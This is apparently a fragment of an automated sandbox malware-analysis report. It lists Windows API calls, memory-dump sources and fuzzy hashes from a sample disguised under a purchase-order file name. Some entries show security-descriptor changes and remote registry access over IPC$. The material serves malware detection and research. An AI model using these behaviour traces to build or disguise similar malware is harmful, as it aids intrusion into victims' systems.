                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0046E85C
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0046E872
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3840717409-0
                                                                                                                                                                                                      • Opcode ID: ee3b4eaa2bb00717be7c8dd40cc1e730c2c539aaab15d6c983e34c33c2c99168
                                                                                                                                                                                                      • Instruction ID: bbe379a3d369c15808953ba8d2511d5ef9f42df1505e87a7dc6f0ce051fe7f67
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee3b4eaa2bb00717be7c8dd40cc1e730c2c539aaab15d6c983e34c33c2c99168
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0415975A01208EFDB11AF65CC88EAF7BB8EF89725F104469F906D72A0D7349D41CB25
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 0045076F
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00450787
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00450799
                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004507AE
                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004507C2
                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 004507DA
                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 004507F4
                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00450806
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                      • API String ID: 34673085-438819550
                                                                                                                                                                                                      • Opcode ID: ff5e0aed43fc8de9fb838faa9418ce3fd369cb65696d28d22a61ac5ec733e13f
                                                                                                                                                                                                      • Instruction ID: 7bdd4fe60b36691808eedc24269dbd53bee5a982b2c8d40390e9c2bde986c826
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff5e0aed43fc8de9fb838faa9418ce3fd369cb65696d28d22a61ac5ec733e13f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D818E755043019FCB24EF24C84596FB3E8BB88305F148C2FFC85D7252EA38E9598B9A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F
                                                                                                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0046EF3B
                                                                                                                                                                                                      • GetFocus.USER32 ref: 0046EF4B
                                                                                                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 0046EF56
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0046F081
                                                                                                                                                                                                      • GetMenuItemInfoW.USER32 ref: 0046F0AC
                                                                                                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 0046F0CC
                                                                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0046F0DF
                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0046F113
                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0046F15B
                                                                                                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0046F193
                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0046F1C8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                      • API String ID: 1296962147-4108050209
                                                                                                                                                                                                      • Opcode ID: 29317c9bbadd724918496d85de70a85e49681d28a90312e95a68292b400220de
                                                                                                                                                                                                      • Instruction ID: fd95b6122f1952d93dd32aac1146559e7f8eb789f171782a5aa65823d75a237c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29317c9bbadd724918496d85de70a85e49681d28a90312e95a68292b400220de
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87817974605301AFD710CF15D884AABBBE9FB89358F00492FF99497291E738DD09CB9A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0043ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0043ABD7
                                                                                                                                                                                                        • Part of subcall function 0043ABBB: GetLastError.KERNEL32(?,0043A69F,?,?,?), ref: 0043ABE1
                                                                                                                                                                                                        • Part of subcall function 0043ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0043A69F,?,?,?), ref: 0043ABF0
                                                                                                                                                                                                        • Part of subcall function 0043ABBB: HeapAlloc.KERNEL32(00000000,?,0043A69F,?,?,?), ref: 0043ABF7
                                                                                                                                                                                                        • Part of subcall function 0043ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043AC0E
                                                                                                                                                                                                        • Part of subcall function 0043AC56: GetProcessHeap.KERNEL32(00000008,0043A6B5,00000000,00000000,?,0043A6B5,?), ref: 0043AC62
                                                                                                                                                                                                        • Part of subcall function 0043AC56: HeapAlloc.KERNEL32(00000000,?,0043A6B5,?), ref: 0043AC69
                                                                                                                                                                                                        • Part of subcall function 0043AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0043A6B5,?), ref: 0043AC7A
                                                                                                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0043A8CB
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0043A8E0
                                                                                                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0043A8FF
                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 0043A910
                                                                                                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0043A94D
                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0043A969
                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 0043A986
                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0043A995
                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0043A99C
                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0043A9BD
                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 0043A9C4
                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0043A9F5
                                                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0043AA1B
                                                                                                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0043AA2F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3996160137-0
                                                                                                                                                                                                      • Opcode ID: bf7c28dd186497545c2042e8706342816a1cb9ee0fceefb4c30e9748a26ccecd
                                                                                                                                                                                                      • Instruction ID: a5b523d4b2b3644710638cbaf41432f6dd7c5ae5a535f21993417544a1ff56ad
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf7c28dd186497545c2042e8706342816a1cb9ee0fceefb4c30e9748a26ccecd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D518EB1900209AFCF00DF91DD44EEEBBB9FF09304F04952AF951A7290DB399A15CB65
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LoadString__swprintf_wprintf
                                                                                                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                      • API String ID: 2889450990-2391861430
                                                                                                                                                                                                      • Opcode ID: b0c44815ca18134a442b23991ed0fc429386b9746ac81cb5eef9ed53fb1c3f11
                                                                                                                                                                                                      • Instruction ID: b87f9b5062a23003fa6b05271adbf52b62758fb0d399078fd318079a70c5a6e2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0c44815ca18134a442b23991ed0fc429386b9746ac81cb5eef9ed53fb1c3f11
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B518471900109BADB14EBA1DD82EEEB778AF04304F50017BF505721A2EB386E55DFA8
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LoadString__swprintf_wprintf
                                                                                                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                      • API String ID: 2889450990-3420473620
                                                                                                                                                                                                      • Opcode ID: 762216de5d55f3372a3bd5cd174e2287c2535f968fb2f6ec9abbe759d8498f52
                                                                                                                                                                                                      • Instruction ID: 0117c1f52f1ff57d1bcb18ef8004b0eea4860d9531de2a50c9a6b6b6bbec22b3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 762216de5d55f3372a3bd5cd174e2287c2535f968fb2f6ec9abbe759d8498f52
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D51C371900119AADB14EBE2DD82EEEB778EF04344F50017BB405720A2DB786F59DFA9
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 004455D7
                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00445664
                                                                                                                                                                                                      • GetMenuItemCount.USER32(004C1708), ref: 004456ED
                                                                                                                                                                                                      • DeleteMenu.USER32(004C1708,00000005,00000000,000000F5,?,?), ref: 0044577D
                                                                                                                                                                                                      • DeleteMenu.USER32(004C1708,00000004,00000000), ref: 00445785
                                                                                                                                                                                                      • DeleteMenu.USER32(004C1708,00000006,00000000), ref: 0044578D
                                                                                                                                                                                                      • DeleteMenu.USER32(004C1708,00000003,00000000), ref: 00445795
                                                                                                                                                                                                      • GetMenuItemCount.USER32(004C1708), ref: 0044579D
                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(004C1708,00000004,00000000,00000030), ref: 004457D3
                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 004457DD
                                                                                                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 004457E6
                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(004C1708,00000000,?,00000000,00000000,00000000), ref: 004457F9
                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00445805
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3993528054-0
                                                                                                                                                                                                      • Opcode ID: fe47924269ecb829c8cb5bb70370f5f918f2a5a71e0279e36aa44755a4212213
                                                                                                                                                                                                      • Instruction ID: 8c316e5e6c6797ab3a2176d1e40451a3ac209fe88f8ea6b3beab8faaca75f620
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe47924269ecb829c8cb5bb70370f5f918f2a5a71e0279e36aa44755a4212213
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB71E230641A15BBFF209B15DC49FAABF65FF40368F24021BF618AA2D2C7795C10DB99
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 00AF2543
                                                                                                                                                                                                        • Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF3090
                                                                                                                                                                                                        • Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF30A2
                                                                                                                                                                                                        • Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF30B4
                                                                                                                                                                                                        • Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF30C6
                                                                                                                                                                                                        • Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF30D8
                                                                                                                                                                                                        • Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF30EA
                                                                                                                                                                                                        • Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF30FC
                                                                                                                                                                                                        • Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF310E
                                                                                                                                                                                                        • Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF3120
                                                                                                                                                                                                        • Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF3132
                                                                                                                                                                                                        • Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF3144
                                                                                                                                                                                                        • Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF3156
                                                                                                                                                                                                        • Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF3168
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF2538
                                                                                                                                                                                                        • Part of subcall function 00AF2096: HeapFree.KERNEL32(00000000,00000000,?,00AF3208,?,00000000,?,00000000,?,00AF322F,?,00000007,?,?,00AF2697,?), ref: 00AF20AC
                                                                                                                                                                                                        • Part of subcall function 00AF2096: GetLastError.KERNEL32(?,?,00AF3208,?,00000000,?,00000000,?,00AF322F,?,00000007,?,?,00AF2697,?,?), ref: 00AF20BE
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF255A
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF256F
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF257A
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF259C
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF25AF
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF25BD
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF25C8
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF2600
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF2607
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF2624
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF263C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                                                                      • Opcode ID: 30b6a39771df7d0d9c6c68c379d0c8698572d6253734c0b102d69cdcd58e7a97
                                                                                                                                                                                                      • Instruction ID: d407a988795319ada41954d1d6e0c5b346fa8f9d82f2c5e464f1bf2e002dfbcd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30b6a39771df7d0d9c6c68c379d0c8698572d6253734c0b102d69cdcd58e7a97
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08311972A003099BEB31ABB8D945BB6B7E9FB00351F144429F65AD7291DE75ED80CB10
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0043A1DC
                                                                                                                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0043A211
                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0043A22D
                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0043A249
                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0043A273
                                                                                                                                                                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0043A29B
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0043A2A6
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0043A2AB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                                                                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                      • API String ID: 1687751970-22481851
                                                                                                                                                                                                      • Opcode ID: 8e89b60b28c57dbbb31bac0aaff507f3a2d39c807fdeec03431fd816579aeec0
                                                                                                                                                                                                      • Instruction ID: 36ac115add83da1bd3147b99ffcafd1a036894dfbf49d0a91a3d47e0976b8548
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e89b60b28c57dbbb31bac0aaff507f3a2d39c807fdeec03431fd816579aeec0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70411A71C10229AACF15EBA5DC85DEEB778FF08314F00456AF801B72A0DB789D15CBA4
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 004467FD
                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0044680A
                                                                                                                                                                                                        • Part of subcall function 0042172B: __woutput_l.LIBCMT ref: 00421784
                                                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00446834
                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00446840
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 0044684D
                                                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 0044686D
                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 0044687F
                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0044688E
                                                                                                                                                                                                      • LockResource.KERNEL32(?), ref: 0044689A
                                                                                                                                                                                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 004468F9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
